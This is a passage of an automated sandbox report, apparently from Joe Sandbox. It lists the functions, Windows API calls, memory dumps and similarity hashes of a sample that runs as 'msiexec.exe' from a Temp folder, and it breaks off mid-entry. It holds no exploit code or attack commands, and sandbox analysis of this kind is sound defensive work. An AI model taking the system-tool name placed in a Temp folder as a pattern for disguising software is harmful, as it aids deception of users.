Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3481335202
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 857343acb9398127b83b67a88284cb3acf20d602f6beb627bdaaa73bf87bc8f8
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: 19F0A736348204BAE7105E55DC04B9B7F99DFD1750F14C027F9449B1C0D6F099589BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004030C6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CC6
Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CD3
Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CD8
Part of subcall function 00405C6E: CharPrevA.USER32(?,?), ref: 00405CE8

CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 004030E7

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004030C7, 004030CC, 004030D2, 004030DE, 004030E6, 004030ED
1033, xrefs: 004030EE

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-1176120985
Opcode ID: 9fc94c8ce289ceace51d82d7694160c71b26e7ee5232ad3accb455f1d4d4e313
Instruction ID: 7f1b43601f0a10077d0081c2ba5ec5825ac71a1bded9547d22d949ebda8a6a9f
Opcode Fuzzy Hash: 9fc94c8ce289ceace51d82d7694160c71b26e7ee5232ad3accb455f1d4d4e313
Instruction Fuzzy Hash: B6D0922150AD3031D651322A3E06BCF154D8F4636AF65807BF944B608A4A6C2A825AEE

Uniqueness

Uniqueness Score: -1.00%

Function 00405D2E Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
LoadLibraryA.KERNEL32(?), ref: 00405D4B
GetProcAddress.KERNEL32(00000000,?,?,00000000,0040313D,00000008), ref: 00405D5C

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
Instruction ID: 58781945b1ebe0d6425232f008294b0fb1b641fb0524d4e5e5734917004db801
Opcode Fuzzy Hash: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
Instruction Fuzzy Hash: 8CE08C36A04510BBD3215B30AE08A6B73ACEEC9B41304897EF615F6251D734AC11DBBA

Uniqueness

Uniqueness Score: -1.00%

Function 00401DC1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E07

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401DF2

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 587946157-2935972921
Opcode ID: 92a71e7eb882e930239a50fdfd0ea1f39457095dd02150c3192536a82a5d7dc6
Instruction ID: 1d9e37e4724715ff8eb4cd61c52570f4e17590a8471f76494d0d603f05069ab9
Opcode Fuzzy Hash: 92a71e7eb882e930239a50fdfd0ea1f39457095dd02150c3192536a82a5d7dc6
Instruction Fuzzy Hash: C3F04C73B04301AACB50AFB19D4AE5E3BA8AB41398F200637F510F70C1D9FC8801B318

Uniqueness

Uniqueness Score: -1.00%

Function 004023AF Relevance: 3.1, APIs: 2, Instructions: 57
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402B00: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000022,00000000), ref: 00402B28

RegQueryValueExA.ADVAPI32 ref: 004023DF
RegCloseKey.ADVAPI32(?), ref: 0040247D

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 0d017b4a1ff679f66b1b70c9321ccb7683fc271020f3e65c8c30c9d46f938ea0
Instruction ID: b014844320ad767dada11dd3629d5dc4f3fca22d365999f113298c01dbc1c66c
Opcode Fuzzy Hash: 0d017b4a1ff679f66b1b70c9321ccb7683fc271020f3e65c8c30c9d46f938ea0
Instruction Fuzzy Hash: B011C471904205EFDB15DF64CA889AE7BB4EF14348F20807FE442B72C1D2B88A45EB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32 ref: 004013E4
SendMessageA.USER32 ref: 004013F4

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
Instruction ID: 8223ec958efd2c964e321ebce6dca8e406ed2778dd364e0d2667d4e2a9ef0db3
Opcode Fuzzy Hash: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
Instruction Fuzzy Hash: FE01F4317242109BE7299B799D04B6A36D8E710325F14453FF955F72F1D678DC028B4D

Uniqueness

Uniqueness Score: -1.00%

Function 004056E3 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000003,00402C62,C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe,80000000,00000003), ref: 004056E7
CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405709

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,00000000,00000000,00000000,000000FF), ref: 00403094

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction ID: 43e3c0ed55451ca58d66c179b0d5cd373ba627774d09ad719adf1b780fd88a5d
Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction Fuzzy Hash: F0E08631101119BBCF105E61AC00A9B3F9CEB05362F00C032FA04E5190D538DA14DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402B00 Relevance: 1.5, APIs: 1, Instructions: 22
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000022,00000000), ref: 00402B28

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 332b4b28ccf70e09bb7c329d8b92fdd51d6a369451d7e4fe1d23c46d78dfb372
Instruction ID: 26822e9457f7499eaf47d686268157363fcd7c772d88ad4a089d565b944a1739
Opcode Fuzzy Hash: 332b4b28ccf70e09bb7c329d8b92fdd51d6a369451d7e4fe1d23c46d78dfb372
Instruction Fuzzy Hash: 4DE08CB6240108BFDB50EFA5ED4BFD677ECBB04340F008921B618EB091CA75E5809B68

Uniqueness

Uniqueness Score: -1.00%

Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNEL32(00000000,?,000000F0), ref: 004015A0

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 809357781c56f2c76ef79b951587c5f6b4cfd4d6a7e3ad04df5d4f6c06b5662e
Instruction ID: fb11a27b057d952daa1a0232a569a569c421c01e2099f6af0567112f3631a007
Opcode Fuzzy Hash: 809357781c56f2c76ef79b951587c5f6b4cfd4d6a7e3ad04df5d4f6c06b5662e
Instruction Fuzzy Hash: 60D01273B08211D7DB50EFA59E4859D7664AB503A8B204637E512F11D0D2B98541A619

Uniqueness

Uniqueness Score: -1.00%

Function 004030AF Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00402DE9,?), ref: 004030BD

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040347B Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF), ref: 00403486

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5a6660c02ad1c86e623dcf8c9c59cdfb5971a71a93a5c6486248268c0836a900
Instruction ID: dd629d7ffa80b2531d7668e5a1a305395e4adc4893f6b58610a8e469f8d50dee
Opcode Fuzzy Hash: 5a6660c02ad1c86e623dcf8c9c59cdfb5971a71a93a5c6486248268c0836a900
Instruction Fuzzy Hash: F8C01230504600E6D2246F759E0A6093A18574173AB904336B179B50F1C77C5901453E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004046F9 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404710
GetDlgItem.USER32(?,00000408), ref: 0040471D
GlobalAlloc.KERNEL32(00000040,?), ref: 00404769
LoadBitmapA.USER32 ref: 0040477C
SetWindowLongA.USER32(?,000000FC,00404CFA), ref: 00404796
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004047AA
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004047BE
SendMessageA.USER32 ref: 004047D3
SendMessageA.USER32 ref: 004047DF
SendMessageA.USER32 ref: 004047F1
DeleteObject.GDI32(?), ref: 004047F6
SendMessageA.USER32 ref: 00404821
SendMessageA.USER32 ref: 0040482D
SendMessageA.USER32 ref: 004048C2
SendMessageA.USER32 ref: 004048ED
SendMessageA.USER32 ref: 00404901
GetWindowLongA.USER32(?,000000F0), ref: 00404930
SetWindowLongA.USER32(?,000000F0,00000000), ref: 0040493E
ShowWindow.USER32(?,00000005), ref: 0040494F
SendMessageA.USER32 ref: 00404A52
SendMessageA.USER32 ref: 00404AB7
SendMessageA.USER32 ref: 00404ACC
SendMessageA.USER32 ref: 00404AF0
SendMessageA.USER32 ref: 00404B16
ImageList_Destroy.COMCTL32(?), ref: 00404B2B
GlobalFree.KERNEL32(?), ref: 00404B3B
SendMessageA.USER32 ref: 00404BAB
SendMessageA.USER32 ref: 00404C54
SendMessageA.USER32 ref: 00404C63
InvalidateRect.USER32(?,00000000,00000001), ref: 00404C83
ShowWindow.USER32(?,00000000), ref: 00404CD1
GetDlgItem.USER32(?,000003FE), ref: 00404CDC
ShowWindow.USER32(00000000), ref: 00404CE3

Strings

, xrefs: 00404CBB
N, xrefs: 0040498D
M, xrefs: 004048A9

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 9006264d80cea567de8ea85ae76f5f4e6db86d56f38ece968a838e3dcd762fad
Instruction ID: 30a51c26aaa2b30bd696497e7e47c5adc9155ce2862f65cc436e234c57937e2f
Opcode Fuzzy Hash: 9006264d80cea567de8ea85ae76f5f4e6db86d56f38ece968a838e3dcd762fad
Instruction Fuzzy Hash: D402AFB0A00208AFDB20DF55DD45AAE7BB5FB84314F10817AF611BA2E1D7799E42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404EE8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00404F47
GetDlgItem.USER32(?,000003EE), ref: 00404F56
GetClientRect.USER32 ref: 00404F93
GetSystemMetrics.USER32 ref: 00404F9B
SendMessageA.USER32 ref: 00404FBC
SendMessageA.USER32 ref: 00404FCD
SendMessageA.USER32 ref: 00404FE0
SendMessageA.USER32 ref: 00404FEE
SendMessageA.USER32 ref: 00405001
ShowWindow.USER32(00000000,?), ref: 00405023
ShowWindow.USER32(?,00000008), ref: 00405037
GetDlgItem.USER32(?,000003EC), ref: 00405058
SendMessageA.USER32 ref: 00405068
SendMessageA.USER32 ref: 00405081
SendMessageA.USER32 ref: 0040508D
GetDlgItem.USER32(?,000003F8), ref: 00404F65

Part of subcall function 00403DF3: SendMessageA.USER32 ref: 00403E01

GetDlgItem.USER32(?,000003EC), ref: 004050AA
CreateThread.KERNEL32(00000000,00000000,Function_00004E7C,00000000), ref: 004050B8
CloseHandle.KERNEL32(00000000), ref: 004050BF
ShowWindow.USER32(00000000), ref: 004050E3
ShowWindow.USER32(?,00000008), ref: 004050E8
ShowWindow.USER32(00000008), ref: 0040512F
SendMessageA.USER32 ref: 00405161
CreatePopupMenu.USER32 ref: 00405172
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405187
GetWindowRect.USER32(?,?), ref: 0040519A
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004051BE
SendMessageA.USER32 ref: 004051F9
OpenClipboard.USER32(00000000), ref: 00405209
EmptyClipboard.USER32 ref: 0040520F
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405218
GlobalLock.KERNEL32 ref: 00405222
SendMessageA.USER32 ref: 00405236
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040524E
SetClipboardData.USER32 ref: 00405259
CloseClipboard.USER32 ref: 0040525F

Strings

{, xrefs: 0040514E

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

